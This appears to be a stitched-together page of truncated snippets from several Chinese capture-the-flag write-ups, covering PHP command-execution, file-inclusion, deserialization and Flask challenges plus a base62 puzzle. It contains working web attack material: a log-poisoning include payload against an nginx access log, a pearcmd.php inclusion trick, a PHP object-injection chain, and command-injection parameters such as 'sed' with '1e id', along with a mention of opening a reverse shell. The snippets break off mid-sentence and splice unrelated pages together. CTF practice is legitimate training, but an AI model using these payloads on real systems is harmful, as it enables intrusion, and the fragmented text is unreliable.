num1=include"/var/log/nginx/access.log";&symbol=-&num2=123 easy_cmd# 源码 Copy <?phperror_reporting(0);highlight_file(__FILE__);$cmd=$_POST['cmd'];if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){exec(escapeshellcmd($cmd)); }?> 只能用四种命令ping|ls|nc|ifconfig 有...
phpclass ctf{ public $h1; public $h2;}class show{}class Chu0_write{ public $chu0; public $chu1; public $cmd;}$a=new ctf();$a->h1=new show();$a->h2=[[2=>new Chu0_write()]]; //注意这里的参数是ctf()的h2 //__call($name,$args)中的$args已经是一个数组,所h2只用嵌套两...
easyPytHon_P也是python题目subprocess.run([cmd[:3], param, file], cwd=os.getcwd(), timeout=5)关键函数主要为这个命令执行 首先长度限制在三位 提供两个参数满足即可 值得注意的是接收参数是get 实际上是需要传输postpayload答案不唯一 这个也可以反弹shellcmd=sed¶m=1e id cmd=cat¶m=flag.txt ...
easyPHP <?php# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2022-03-19 12:10:55# @Last Modified by: h1xa# @Last Modified time: 2022-03-19 13:27:18# @email: h1xa@ctfer.com# @link: https://ctfer.comerror_reporting(0);highlight_file(__FILE__);$cmd = $_POST['cmd'...
easy_include 代码语言:javascript 复制 <?phpfunctionwaf($path){$path=str_replace(".","",$path);returnpreg_match("/^[a-z]+/",$path);}if(waf($_POST[1])){include"file://".$_POST[1];} 文件包含,.替换成空,同时路径首字母必须是字母 ...
require_once 'pearcmd.php'; easy_web php版本为5.5.9 代码语言:javascript 复制 <?php header('Content-Type:text/html;charset=utf-8'); error_reporting(0); function waf1($Chu0){ foreach ($Chu0 as $name => $value) { if(preg_match('/[a-z]/i', $value)){ ...
17EZ_avbv(easy) 18贝斯多少呢 base62穷举分段 给了段编码,hint为base62 8nCDq36gzGn8hf4M2HJUsn4aYcYRBSJwj4aE0hbgpzHb4aHcH1zzC9C3IL 随波逐流和Cyberchef都没梭哈出来 看了师傅们的wp大概意思是: 分组
Easy简单的使用和学习设计,减少了阅读文档的时间。 Short减少代码重复,每个参数声明的多个特性,更少的错误。 Robust获得生产就绪代码。自动交互文档。 Standards-based基于开放的标准API:OpenAPI和JSON Schema 是python框架啊,那没事了,盲猜ssti。挂一个万能ssti文章:https://www.anquanke.com/post/id/188172。
easyPytHon_P这道题是给了源码我们分析一下,我们需要传入两个参数 一个 cmd 一个param,后面有个命令执行的函数,所以我们需要构造一个命令,用这两个参数,但是 cmd 是有限制的,只能读取三位,分析完毕,我们开始构造payloadcmd=ls¶m=/ 但是我们传参数始终不对,没有得到我们想要的结果,其实这里又考了flask的传...
14 - easyPytHon_P题目分析from flask import request # 导入函数文件flask中的request模块 cmd: str = request.form.get('cmd') # 从表单获取cmd的值以字符串类型赋给cmd。str起类型提示作用,非强制 param: str = request.form.get('param') # 从表单获取param的值以字符串类型赋给param。 # --- Don'...